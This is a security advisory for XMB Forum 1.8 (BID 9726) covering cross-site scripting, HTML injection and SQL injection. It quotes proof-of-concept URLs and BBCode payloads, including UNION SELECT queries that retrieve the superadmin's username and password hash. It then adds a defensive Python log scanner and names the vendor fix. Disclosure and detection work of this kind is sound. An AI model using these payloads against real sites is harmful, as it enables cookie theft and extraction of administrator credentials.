XMB Forum Multiple Input Validation Vulnerabilities
BID:9726
Info
| Bugtraq ID: | 9726 |
| Class: | Input Validation Error |
| CVE: | CVE-2004-0322, CVE-2004-0323 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 23 2004 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | Discovery of these vulnerabilities has been credited to Janek Vind. |
| Vulnerable: | XMB Forum 1.8 SP2, XMB Forum 1.8 SP1, XMB Forum 1.8 |
| Not Vulnerable: | XMB Forum 1.8 SP3 |
Discussion
XMB Forum has been reported prone to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. The issues result from insufficient sanitization of remote user-supplied data. An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user, or to have malicious SQL queries executed against the underlying database.
Exploit / POC
The following proof of concept has been supplied:
Cross-Site Scripting:
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&foobar=<%73cript>
http://www.example.com/xmb18sp2/member.php?action=viewpro&member=x<%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/u2uadmin.php?uid=x"><%73cript>alert(document.cookie);</%73cript>
http://www.example.com/xmb18sp2/editprofile.php?user=x"><%73cript>alert(document.cookie);</%73cript>
HTML Injection:
text1 [align=center onmouseover=alert(document.cookie);] text2 [/align]
text1 [img=1x1]javascript:alert(document.cookie);//gif[/img] text2
SQL Injection:
http://www.example.com/xmb18sp2/viewthread.php?tid=1&ppp=x
http://www.example.com/xmb18sp2/misc.php?action=list&order=postnum&desc=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&tpp=x
http://www.example.com/xmb18sp2/forumdisplay.php?fid=1&ascdesc=x
http://www.example.com/xmb18sp2/stats.php?action=view&addon=x
Getting username for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,username FROM xmb_members WHERE uid=1 LIMIT 1/*
Getting password's md5 hash for superadmin:
http://www.example.com/xmb18sp2/stats.php?action=view&addon=WHERE t.tid<0 UNION ALL SELECT NULL,NULL,password FROM xmb_members WHERE uid=1 LIMIT 1/*
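As an added example (not part of the original advisory and not XMB's own code), the following Python script flags requests in a web server access log that are shaped like the proof-of-concept URLs above. The rules for ppp, tpp, ascdesc and desc, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumptions (not taken from XMB's source): ppp/tpp are page sizes and must
# be integers; ascdesc/desc are sort directions and must be "asc" or "desc".
NUMERIC = {"ppp", "tpp"}
DIRECTION = {"ascdesc", "desc"}
MARKUP = re.compile(r'[<>"]')
SQL_WORDS = re.compile(r"\b(union|select|where)\b", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def check_target(target):
    """Return sorted findings for one request target (path plus query)."""
    findings = set()
    # parse_qsl percent-decodes, so <%73cript> is matched as <script>.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if MARKUP.search(name + value):
            findings.add(f"markup in {name}")
        if SQL_WORDS.search(value):
            findings.add(f"SQL keywords in {name}")
        if name in NUMERIC and not value.isdigit():
            findings.add(f"non-numeric {name}")
        if name in DIRECTION and value.lower() not in ("asc", "desc"):
            findings.add(f"bad sort direction in {name}")
    return sorted(findings)


def scan(log_lines):
    """Map each flagged request target to its findings."""
    hits = {}
    for line in log_lines:
        match = REQUEST.search(line)
        if match and (found := check_target(match.group(1))):
            hits[match.group(1)] = found
    return hits

# Constructed access-log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2004:10:00:00 +0000] "GET /xmb18sp2/forumdisplay.php?fid=1&tpp=25 HTTP/1.0" 200 5120',
    '192.0.2.11 - - [01/Mar/2004:10:00:05 +0000] "GET /xmb18sp2/forumdisplay.php?fid=1&foobar=%3C%73cript%3E HTTP/1.0" 200 5200',
    '192.0.2.11 - - [01/Mar/2004:10:00:09 +0000] "GET /xmb18sp2/viewthread.php?tid=1&ppp=x HTTP/1.0" 200 310',
    '192.0.2.11 - - [01/Mar/2004:10:00:12 +0000] "GET /xmb18sp2/misc.php?action=list&order=postnum&desc=x HTTP/1.0" 200 298',
    '192.0.2.11 - - [01/Mar/2004:10:00:20 +0000] "GET /xmb18sp2/stats.php?action=view&addon=WHERE%20t.tid%3C0%20UNION%20ALL%20SELECT%20NULL HTTP/1.0" 200 4100',
]

if __name__ == "__main__":
    for target, found in scan(SAMPLE_LOG).items():
        print(target, "->", ", ".join(found))
```

The keyword and markup checks are heuristics and will also match harmless values containing words such as "where", so treat hits as leads to review rather than confirmed exploitation.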
Solution / Fix
Solution:
The vendor has released XMB 1.8 SP3 to address these issues.
XMB Forum 1.8
- XMB Forum 1.8 SP3: http://www.xmbforum.com/download/1.8/?type=zip
XMB Forum 1.8 SP2
- XMB Forum 1.8 SP3: http://www.xmbforum.com/download/1.8/?type=zip
XMB Forum 1.8 SP1
- XMB Forum 1.8 SP3: http://www.xmbforum.com/download/1.8/?type=zip
References
References:
- XMB Forum Home Page (The XMB Group)
- [waraxe-2004-SA#004] - Multiple vulnerabilities in XMB 1.8 Partagium Final SP2 (Janek Vind)